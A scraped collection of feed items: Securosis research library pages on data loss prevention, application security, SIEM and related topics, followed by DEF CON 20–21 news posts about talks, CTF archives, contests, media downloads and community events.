http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis. We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP. Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well). 1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution(/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics- features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP. 2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed. 3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution. 6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention. 7. A short piece I did for Network World on DLP, and why it’s worth looking at now. 8. I’m a big proponent of full DLP solutions- this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem. 9. The dirty little secret of DLP. 10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP. 11. Then a post on how those two worlds will connect. 12. A Network World article I wrote on pitfalls of DLP. 13. A look at the differences between DLP, content classification, and e-discovery. 14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers. 15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term. Presentations --------- Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here. Full Suite DLP * CA (Orchestria) * Code Green Networks * EMC/RSA (Tablus) * GTB Technologies * McAfee (Reconnex) * Symantec (Vontu) * Vericept * Websense (PortAuthority) * Workshare Network-only tools * Clearswift * Fidelis Security Systems * Palisade Systems * Proofpoint Endpoint-only tools * NextSentry * Trend Micro (Provilla) * Verdasys Subscribe to our daily email digest

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics; such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing. Papers and Posts ------------ * Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. * How Common Applications Are (Now) the Weakest Link. * Comments on “Containing Conficker” considers some of the challenges most application developers are up against. * Immutable Log technologies help with auditing and event trail verification. * For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well). * Separation of Duties, Concept of Least Privilege, and other role-based user security measures. * The Perils of the Insider Threat. * PDF Security Pain, and stuff to think about on all script-enabled applications. * A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools. Presentations --------- * Security + Agile = FAIL. Live presentation is here. * This presentation covers Major Enterprise Application Security. Podcasts, Webcasts and Multimedia
Subscribe to our daily email digest

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today. 2. LogLogic Acquires Exaprotect. 3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks. General Coverage ------------ 1. Policies and Security Products, covering the expense of policy creation and maintenance. Presentations --------- 1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Vendors ArcSight CA CISCO MARS eIQ ExaProtect IBM Intellitactics LogLogic LogRhythm NetForensics NetIQ NitroSecurity Quest InTrust RSA EnVision Sensage Symantec SSIM Tenable TriGeo Q1 Labs Subscribe to our daily email digest

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums: * The Project Quant Blog and Landing Page * The Project Quant Forums Published project documents include: * Version 1.0 of the Project Quant Report * The Project Quant Survey Results Analysis Here are the raw survey results from the project’s Open Patch Management Survey: * Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CVS formats.) * The survey is still active, and you can participate here. Subscribe to our daily email digest

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity. Papers and Posts ------------ 1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2. 2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 3. What is my motivation, or Why Are We Talking About ADMP. 4. ADMP and Assessment: Linking preventative and detective technologies. 5. ADMP: A Policy Driven Example. 6. Web Application Security: We Need Web Application Firewalls to Work. Better. 7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation. Presentations --------- * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Subscribe to our daily email digest

==> New DEF CON Torrent Page!

https://www.defcon.org/defconrss.xml Have you ever gone to download some of our content, and said to yourself, "I wish there was a torrent of all this..."? Well now there are 20 years worth, and then some! Check out the new DEF CON Torrent Page, and start sucking down the data in massive chunks to your heart's content! Enjoy!

==> DEF CON in the News - Silent War

https://www.defcon.org/defconrss.xml There's a new article up on the Vanity Fair site called "Silent War", which discusses the history and growing concerns of cyber warfare. It even mentions us here at DEF CON, and one of our long time speakers, Wes Brown. Have yourself a look at: http://www.vanityfair.com/culture/2013/07/new-cyberwar-victims-american-business

==> DEF CON 20 Speaker and Slides Videos + Photos!

https://www.defcon.org/defconrss.xml We have a couple new torrents up we think you may enjoy. At long last the DEF CON 20 Speaker and Slides videos are available as a collection. We also have a collection of photos from DEF CON 20! You can find them at the following links: DEF CON 20 Speaker and Slides Videos (Torrent) DEF CON 20 Pictures (Torrent) Enjoy!

==> More CTF Packets to Peruse!

https://www.defcon.org/defconrss.xml Well, we said we were going to post the DEF CON 18 complete CTF packet captures for your downloading pleasure. We've not only done that, but posted DEF CON 19's CTF pcaps as well! Feast your fancy calculation boxes on all that CTF goodness! You can find these in handy torrent form at the following links: DEF CON 18 CTF Packet Captures (Torrent) DEF CON 19 CTF Packet Captures (Torrent) Enjoy, and keep your eyes peeled for other downloadable goodies later this week!

==> Live Transcription at DEF CON 21!

https://www.defcon.org/defconrss.xml Dark Tangent has signed a contract with a company to transcribe all the speaking tracks as well as the closing ceremony in english. What does this mean? It means for the third time in DEF CON history we will officially be supporting the hearing impaired. This time around it will be with real time transcription appearing on screen, much like what you would see if you had captioning turned on your TV. We will get cleaned up files after the con for each speech, allowing us to post the presentation text, as well as caption the video files. See DT's original post to see how you may be able to help with this! So with that said, we would hate to go through all the work and expense and only have two security ninjas who are hearing impaired attend. Let's promote this far and wide, and over the next couple years try and include as many as possible. The last time we did translation two years in a row we had two or three people the first, and none the second. Let's see if we can do better this time!

==> DEF CON 21 CFP Has Closed! CTF Quals Around the Corner!

https://www.defcon.org/defconrss.xml Well, the DEF CON 21 Call for Papers has come to a close. As always, we got quite a deluge of new submissions right up to the bell. The review board is hard at work, selecting the finest content for your enjoyment. Submitters should know either way if they have been accepted to speak by June 17th! Let us look forward now, to the Capture the Flag Qualification round, which is just over three weeks away. If you and your friends think you have what it takes to compete at DEF CON, it's time to sign up at 2013.legitbs.net, and good luck!

==> CTF Packet Captures from DEF CON 17!

https://www.defcon.org/defconrss.xml Check this out: We have the complete packet captures from the DEF CON 17 Capture the Flag Competition available to download! DDtek has been kind enough to provide them from their years running CTF, and we'll be releasing the PCaps from DEF CON 18, 19, and 20 in the coming weeks for all of you CTF enthusiasts! Enjoy! Direct Download (~1.25 GB) | Emule Collection | Torrent

==> DEF CON Forums For Contest & Event News

https://www.defcon.org/defconrss.xml Wondering what's to do at DEF CON 21? Check out the DEF CON Forums Official / [Parties / Social Gatherings / Events / Contests] Forum, where there is quite a lot going on of late! For example, You may learn that the DEF CON Short Story contest has just under two weeks left to submit. Project 2 has posted some things you need to know about the contest. Details on the DEF CON Cycle_OverRide have recently been posted. You could browse the latest news on the Unofficial DEF CON Shoot. And hey, if you have something in mind that might be cool at DEF CON 21, discuss them with your peers in the New Ideas section to see if they might get traction! It's all happening now, so give it a look!

==> DEF CON 21 Speaker Page Live!

https://www.defcon.org/defconrss.xml Rejoice! The DEF CON 21 Speaker Page is now live, and you can peruse the first round of poppin fresh talks, listed below! Keep an eye on our Twitter, Facebook, and RSS Feed for all the latest updates! MITM All The IPv6 Things Scott Behrens & Brent Bandelgar Evil DoS Attacks and Strong Defenses Sam Bowne & Matthew Prince Home Invasion 2.0 - Attacking Network-Controlled Consumer Devices Daniel "unicornFurnace" Crowley & Jennifer "savagejen" Savage I Can Hear You Now: Traffic Interception and Remote Mobile Phone Cloning with a Compromised CDMA Femtocell Doug DePerry & Tom Ritter JTAGulator: Assisted Discovery Of On-Chip Debug Interfaces Joe Grand aka Kingpin The Dirty South Getting Justified with Technology David Kennedy & Nick Hitchcock (nick8ch) PowerPreter: Post Exploitation Like a Boss Nikhil Mitta The Road Less Surreptitiously Traveled pukingmonkey Stalking a City for Fun and Frivolity Brendan O'Connor De-Anonymizing Alt.Anonymous.Messages Tom Ritter Bruce Schneier Answers Your Questions Bruce Schneier Hacking Wireless Networks of the Future: Security in Cognitive Radio Networks Hunter Scott Predicting Susceptibility to Socialbots on Twitter Chris Sumner & Randall Wald

==> DEF CON 21 Call for Parties Updated with FAQ!

https://www.defcon.org/defconrss.xml If you're thinking about throwing a DEF CON 21 party in our pub crawl, we've put together a list of frequently asked questions to clarify what's what in running one! You can also find the submission form if your ready to take the plunge! There's plenty of room left for your group to make their mark on DEF CON 21, so get those submissions in and make our party row a reality!

==> DC21 CTF Quals Registration is Now Open!

https://www.defcon.org/defconrss.xml In case you haven't heard, as of May 1 you can now register for the DEF CON 21 Capture the Flag qualification round! Get that team together and pop on over to https://legitbs.net/ for all the details and to sign up! The Quals will happen June 15, 2013!

==> The DEF CON 21 Short Story Contest is Underway!

https://www.defcon.org/defconrss.xml The DEF CON 21 Short Story Contest has officially opened! Exercise your wordsmithing talents for the chance to win free admission to DEF CON 21! All of the pertinent details can be found at https://forum.defcon.org/showthread.php?t=13334! Good Luck!

==> The DEF CON 21 Website is Now Live!

https://www.defcon.org/defconrss.xml The DEF CON 21 site is up and running! Check it out for all the latest info on this year's con. Keep checking back for news and developments for DEF CON 21 as they occur! You can also follow us on Twitter, Facebook, or subscribe to our RSS feed!

==> DEF CON 21 Call for DJs/Performers is about to close!

https://www.defcon.org/defconrss.xml If you have long dreamed of the glory of performing live at DEF CON, there's only a few days left in the DEF CON 21 Call for Music/Performers! Check out https://forum.defcon.org/showthread.php?t=13225 if you are interested, and get your self applied by April 30!

==> DEF CON 21 Awards nominations!

https://www.defcon.org/defconrss.xml Weigh in your picks for the 2013 DEF CON Awards! We are currently accepting nominations for the following categories: 1. Worst coverage of security/hacker related issues by a media person or media outlet (Any Media). 2. Best coverage of security/hacker related issues by a media person or media outlet (Any Media). 3. Best privacy enhancing technology for the last 12 months (Since DEF CON 20). 4. Worst privacy enhancing technology for the last 12 months (Since DEF CON 20). 5. Best security or hacker related Twitter feed. 6. The "Nit-Twit" award for the worst security or hacker related Twitter feed. 7. Best project by an approved DEF CON Group. Include a link to project information. 8. Worst / Most Meaningless security or hacker related buzzword for the last 12 months (Since DEF CON 20). 9. Biggest law enforcement of legal system blunder, related to computer security/hackers. (Since DEF CON 20). 10. The "Security Charlatan of the Year" award. Nominations must be submitted no later than midnight, Las Vegas time, on June 31st, 2013, to be considered for inclusion. Thanks!

==> DEF CON 21 Vendor FAQ is Live!

https://www.defcon.org/defconrss.xml Are you a past DEF CON vendor or interested in peddling your wares at DEF CON 21? The Vendor Area FAQ and Application are now live! Check it out at https://defcon.hackingyour.net/faq!

==> DEF CON 21 Pin Giveaway!

https://www.defcon.org/defconrss.xml Kallahar, a long time DEF CON Goon, has started a project this year to manufacture and give away a free DEF CON 21 pin. Their goal is to raise enough donations to give everyone one for free. Read more about it and see how you can help here: https://forum.defcon.org/showthread.php?t=13309

==> CODAME at DEF CON 21!

https://www.defcon.org/defconrss.xml We're excited to have CODAME this year at DEF CON 21! If you're not familar, here's what they're all about (from codame.com): Non-profit Festivals & Events covering tech challenges with emphasis on artistic expression and creativity. Bringing together independent artists, coders, game developers, creators, performers and musicians celebrating Art and Technology. CODAME exists to incubate and support artists, technologists and designers that push the boundaries of hardware, software, and physical/digital mediums. At the intersection of ART+TECH, CODAME is accelerating the way we interpret and express our rapidly changing world. They are having a call for artists for this event! Check it out at: http://codame.com/post/46882234348/can-hackers-be-heroes-excited-to-be-bring-codame

==> DEF CON 21 CTF Quals Announced!

https://www.defcon.org/defconrss.xml The DEF CON 21 CTF Quals and schedule have been announced! Check out https://legitbs.net/ for all the details!

==> DEF CON Video Deals at The Source of Knowledge!

https://www.defcon.org/defconrss.xml The Source of Knowledge has some specials on DEF CON 20 Videos and an early bird special for the DEF CON 21 talks! you can check them out at http://tsok.net/defcon21/index.html. Offers good through June 30.

==> The Call For Def Con Capture The Flag Organizers Is Now Complete!

https://www.defcon.org/defconrss.xml dc-flag On behalf of all the hundreds of staff, volunteers, and community that make DEF CON happen I would like to thank all of the teams, groups, and companies that submitted their vision of how they would run Capture the Flag at DEF CON 21 and beyond. It was very hard to for us at DEF CON World Domination HQ to decide on which vision, and ultimately which team, would have the responsibility of seeing the great CTF tradition into the future. With a record number of five well thought out submissions there were many things that went into our final decision from size of team, resources needed, and the look and feel of the contest. Ultimately the following factors weighed heavily: - Past experience running or participating in high pressure and large scale CTFs - Past experience of organizers in being respected by the community and having skillz - A clearly articulated vision for how CTF would evolve under their direction - A focus on gameplay and describing the scoring system with an eye toward observer education - Increased transparency Thank you again to the five teams that did not get selected, we wish you the best of luck and success in your future contests. And now without any further ado we would like to announce the new organizers! Legitimate Business Syndicate http://legitbs.net/

==> Here's Your Big Shot!

https://www.defcon.org/defconrss.xml Many often ask how they can be involved in DEF CON. After all, The thing that makes DEF CON great is the contribution of the community. If you're so inclined, here are a few ways you can get involved with DEF CON 21! HHV Call for Volunteers https://forum.defcon.org/showthread.php?t=13228 DEF CON Call for Music https://forum.defcon.org/showthread.php?t=13225 DC101 wildcard speaking slot https://forum.defcon.org/showthread.php?t=13230 A ton of opportunies just like these will be popping up over the next weeks and months, and a great place to keep watch for them is the DEF CON Forums. Keep your eyes peeled if you're looking for a way to help out!

==> The DEF CON 21 Call for Papers is Open!

https://www.defcon.org/defconrss.xml The time has arrived, friends. The DEF CON 21 Call for Papers is officially open! Get yourselves over to https://www.defcon.org/html/defcon-21/dc-21-cfp.html for the official announcement, and if you choose to submit, good luck!

==> New DEF CON Badge page!

https://www.defcon.org/defconrss.xml We have a new page up for you DEF CON badge tinkerers out there, The DEF CON Badge page! It has links to some of the mods people have done, badge firmware, the puzzle game walkthroughs, and threads from the Parallax Forums dealing with getting started. It also has a handy link to HackerStickers.com, where you can purchase more badges to control and power your diabolical plots, gear up a workshop at your local DEF CON Group or Hackerspace, or just pick one up for posterity! For now it has the DEF CON 20 badge, but we are hunting down resources for the past badges as well, so keep your eyes on it for updates! Happy badge hacking!

==> Want to Help?

https://www.defcon.org/defconrss.xml Do you want to help at DEF CON? Do you want to see other people have a good time and learn the ropes, willing to run around the convention like a gopher? You gotta start somewhere, consider applying with Highwiz for a position helping out with DC 101. https://forum.defcon.org/showthread.php?t=13193

==> The DEF CON FAQ has been updated!

https://www.defcon.org/defconrss.xml Check out https://www.defcon.org/html/links/dc-faq/dc-faq.html This year DEF CON 21 will be $180, instead of $200 like last year, sticking to what Dark Tangent said about the price increase for 20 being temporary. The CFP will be opening at the end of the month so start planning your research!

==> Run the DEF CON CTF!

https://www.defcon.org/defconrss.xml Calling all hacker groups! Only one month left to put in your applications to be the next DEF CON Capture the Flag Organizers! Do you want the fortune, glory, and challenge of running the DEF CON CTF competition? Check out the call at https://forum.defcon.org/showthread.php?t=13160!

==> Reserve a Room for DEF CON 21!

https://www.defcon.org/defconrss.xml Just for you early planners, the DEF CON 21 room reservation link is now live! The current rates start at $104 Sun-Thurs and $118 Fri-Sat. You can also call 1-888-746-6955 and reference group# SRDEF13. Get that room squared away, space is not unlimited!

==> A Call from DC4420

https://www.defcon.org/defconrss.xml A message from our friends at dc4420.org, Subject: DC4420 - 2013 CFP Hey! I know it's a bit late, but Happy New Year! I've posted the dates for 2013 meetings on dc4420.org but you'll notice there is very little else! That's because we still need talks! For those that are yet to join us for our monthly gathering, the format is we meet in a private room in a pub, we have a 1 hour talk and a 20 minute talk on *any subject*, but hopefully something that is interesting to the 'hacker' community.... in the past we've had everything from reverse engineering Windows DEP to building your own Thermic Lance, so when I say any subject, I really do mean any subject that is either interesting or amusing or preferably both... You will be speaking to a small crowd (normally between 60 and 100), so if you want to practice a talk that you're thinking of submitting to a 'real' conference, or you've already given it somewhere that a small section of London is unlikely to have attended, or you have an idea that you can cover in just 20 minutes and never really though of turning it into a talk, or you've never done any public speaking before then this is the place... you will be most welcome and someone may even buy you a nice warm beer! We have the one-hour slot filled for January, but all others are currently open so don't be shy - send your submission to talks@dc4420.org... All other details are here: http://dc4420.org/ I hope to see you there! Cheers, MM

==> DEF CON Groups on Facebook!

https://www.defcon.org/defconrss.xml Interested in the DEF CON Groups? Blakdayz has fired back up the DEF CON Groups Facebook page, and it's a great place for updates and announcements on what is going on with the DCG scene in general. Also recently updated are the General FAQ and the POC FAQ as well as the Domestic DCG listing. International groups should be updated soon! So have a look, and learn about DEF CON Groups in your area!

==> DEAF CON?

https://www.defcon.org/defconrss.xml Discussions like this are what makes the DEF CON community great, and often lead to kind of innovative solutions you can only get from our attendees! Any ideas? From Deviant Ollam on the DEF CON Forums: ...I know for a fact that I'm not the only hacker with deaf friends, family, loved ones, etc. How many of you have deaf or hard-of-hearing people in your lives who might want to experience DEF CON? What I am proposing in this thread is not a segregated or special area of any kind, a la DEF CON Kids, but simply I'm sort of putting out the call that "if you know deaf people who have thought about coming to DEF CON before, let's all try to make 2013 the year that they DO come for sure!" Read on at: https://forum.defcon.org/showthread.php?t=13183

==> DEF CON Documentary Sneak Peek!

https://www.defcon.org/defconrss.xml This is a look at what's to come when DT releases the full documentary in a couple months. This should get you excited for what's to come! Check out https://media.defcon.org/ The links for downloading the 20 minute preview in 720p and 1080p with both bittorrent and eMule are right at the top under the hacker documentary section. As usual please keep seeding the files to help out your fellow hackers!

==> CTF Call for Organizers Reminder

https://www.defcon.org/defconrss.xml Does your group have what it takes to be the new DEF CON Capture the Flag Organizers? There are still a couple of months left to apply, the call ends Feb 28, 2013. Instructions on how to apply at: https://forum.defcon.org/showthread.php?t=13160

==> Cyber Monday Sale at Hackerstickers.com!

https://www.defcon.org/defconrss.xml DEF CON & Cyber Monday Sale - Check out the special savings (Up to 60% OFF) site-wide on HackerStickers.com! Use coupon code 'FREESTICK' for free sticker with purchase!

==> DEF CON 20 P2P Collections of Speeches!

https://www.defcon.org/defconrss.xml Happy Turkey Day! As a special Thanksgiving treat, we have posted eMule Collections and Torrents of the complete Audio and Slides Video Collections from DEF CON 20! You can find the links at https://media.defcon.org/index.html#dc20. Leech away and give thanks for all that hacking goodness!

==> DEF CON 20 Slides Video and Audio is Live!

https://www.defcon.org/defconrss.xml The long-awaited moment has arrived, and you can now grab all of the DEF CON 20 Video (slides only) and Audio presentations from the DEF CON 20 Archive page! We have also posted a Slides Video RSS and an Audio RSS for those who prefer to grab them that way! We will soon be posting Torrent and eMule links for the complete collections at media.defcon.org Enjoy!

==> Call for CTF Organizers!

https://www.defcon.org/defconrss.xml The call for new DEF CON Capture the Flag organizers is live on the forums! Does your group have what it takes to carry the torch with the infamous DEF CON CTF? https://forum.defcon.org/showthread.php?t=13160

==> DEF CON 20 Artwork for Download!

https://www.defcon.org/defconrss.xml If you enjoyed the artwork at DEF CON 20 on the floors, signs, swag and elswhere, we have put together a little package for you! It contains high res jpg files and is free for personal, non-commercial use! Print it out for your walls, make some computer wallpapers and enjoy! You can find it at: DEF CON 20 Hacking Conference Art (Zip file) Keep an eye out for more art from past DEF CONs in the future!

==> DEF CON 20 Hacker Pyramid and Hacker Jeopardy Video!

https://www.defcon.org/defconrss.xml We now have, for your viewing delight, video from Hacker Jeopardy and 10k Hacker Pyramid at DEF CON 20! This year's Hacker Jeopardy was Winn's last, so check out all the surprises he had in store! Enjoy! Hacker Jeopardy: eMule | Torrent Hacker Pyramid: eMule | Torrent You can also download them individually: DEF CON 20 Hacking Conference - Hacker Jeopardy 1 DEF CON 20 Hacking Conference - Hacker Jeopardy 2 DEF CON 20 Hacking Conference - Hacker Jeopardy 3 DEF CON 20 Hacking Conference - Hacker Jeopardy Final DEF CON 20 Hacking Conference - Hacker Pyramid 1 DEF CON 20 Hacking Conference - Hacker Pyramid 2

==> DEF CON 20 Updated DVD!

https://www.defcon.org/defconrss.xml We've updated the DEF CON 20 DVD with some extra stuff! Updated presentation materials are now on the DVD image, as well as badge firmware, and the missing textfiles in the Extra Bonus Features section! Direct Download (4.5GB)

==> DEF CON 20 SE CTF Report!

https://www.defcon.org/defconrss.xml Social-engineer.org has released a detailed report of the findings from DEF CON 20 Social Engineering CTF Battle of the SExes! http://www.social-engineer.org/?p=3106

==> Tamper Evident MacGyvers!

https://www.defcon.org/defconrss.xml the following YouTube video is a pretty awesome show of ingenuity, by one of the Tamper Evident Contest teams in the MacGyver category at DEF CON 20. Using only items in their hotel room, they attempt to defeat a number of tamper evident devices. Enjoy! http://www.youtube.com/watch?v=MUzPwXPzfHQ

==> DEF CON Behind the Scenes: Zebbler Encanti Decor!

https://www.defcon.org/defconrss.xml Cool video on the making of DEF CON 20 decor for the music events! http://vimeo.com/49428863

==> CTF Archives updated for DEF CON 20!

https://www.defcon.org/defconrss.xml Capture the Flag at DEF CON is a legendary contest of hacking skill, and has grown considerably over the past few years. 20 teams competed for the coveted title this year, and we've updated our CTF Archive page to include as many write-ups from the competion and qualification rounds as we could find. We've also included torrents of the raw pcaps and system image from the DEF CON 20 CTF team ACME PHARM on media.defcon.org, courtesy of @phaktor! These resources and write-ups are meant to not only preserve CTF history, but allow you to dig in and see what the contest is all about! Enjoy!

==> DEF CON 20 Music Compilation Release!

https://www.defcon.org/defconrss.xml Those that were at DEF CON 20 received a music CD along with the Con DVD. This music compilation featured incredible tracks by some extremely talented artists, written especially for this years show. We have now teamed up with Gravitas recordings to release the music comp as a digital download for free, or pay what you want, with all proceeds to benefit the EFF! Here is the Press release from Gravitas: For Immediate Release Contact: John@40HzMedia.com [mailto:John@40HzMedia.com] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Gravitas Presents DEF CON Compilation Free Download ft. Mochipet, MC Frontalot, Minibosses, Cryptex, and more! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File Under: Electronic / Rap / Glitch Hop Release Date: August 2nd, 2012 Downloadable MP3s:Please feel free to Various Artists - DEF CON XX Compilation DEF CON, one of the worlds largest and longest running hacking conferences, celebrates it's 20th year with an energetic and appropriately themed compilation, entitled "XX". Founder and head of the conference Jeff Moss, also known as Dark Tangent, tasked DEF CON "goon" and Muti Music artist Great Scott with curating the talent filled track selections; acknowledging that music can be pure hacker fuel. Glitch-hop producers AMB, Mochipet and Cryptex play alongside a myriad of other genre-gurus - including nerd-rockers Minibosses, tech-electro wizard High Sage, and nerdcore rap professionals MC Frontalot and Dual Core. Listening to this mix of hacker artists is like riding a wave of concentration as you find yourself zoning out to the ambient tones or letting the determining beats direct your fingers across the keyboard. One hundred percent of the proceeds from the sales go to the Electronic Frontier Foundation, a non-profit agency that advocates digital rights and fights for the first amendment against egregious government bills like SOPA and the Cybersecurity Act of 2012. We urge you to purchase the DEF CON XX Compilation and spread the word to your friends and family. Release artwork by DEF CON resident artist: Neil Kronenberg. Tracklist: 1. AMB - On the Run 2. Minibosses - Sports!!! 3. Dale Chase - SSH to Your Heart featuring Shannon Morse 4. Zebbler Encanti Experience - Data Mind 5. MC Frontalot - Secrets From the Future (Crimson Death Remix) 6. Mochipet - Domo's Bass Station 7. ytcracker - Hacker War 8. Great Scott - gr33tz 9. Royal Sapien - In Chicago in the Time of the Fair (Royal Sapien fork for DEF CON XX) 10. REGENERATOR - Slave (DEF CON Discipline Mix by Mach) 11. Dual Core - Fear and Chaos 12. Cryptex - Error 13. High Sage featuring Katy Rokit - Stuck on Ceazar's Challenge (KEW QEIMYUK QEIMYUK QEIM AYM) 14. bil bless - grimjaw (the hunt for the) Cover Art: http://40hzmedia.com/images/dc20-album-art.jpg Links: http://gravitasrecordings.com/ https://www.facebook.com/gravitasrecordings http://www.defcon.org/ Download/Stream Widgets: http://gravitasrecordings.bandcamp.com/album/DEF CON-xx-compilation

==> Let the Updates Begin!

https://www.defcon.org/defconrss.xml Greetings all! That was quite an event, wasn't it? We here at DEF CON HQ and our staff all around the country and the world are still reeling. Now that we've had a minute to catch our breath, we'll start posting all of the contest results, media, press, and more that have come out of DEF CON 20. Let's start with a round-up of some of the news that came from this years show. We've also started receiving contest results. Keep an eye peeled for more updates in the coming days and weeks!

==> Thanks, Everybody!

https://www.defcon.org/defconrss.xml DEF CON 20 is winding down, and it's been another great show. Thanks to everyone who took time out of their summer to attend, whether you're an old-timer or someone here for your first time. It takes a lot of dedicated people to pull off an event of this magnitude, and I want to take a moment to officially thank the crew made this for you. Show 'em a little love - there's no better team anywhere.

==> DEF CON 20 Entertainment Schedule is Now Live!

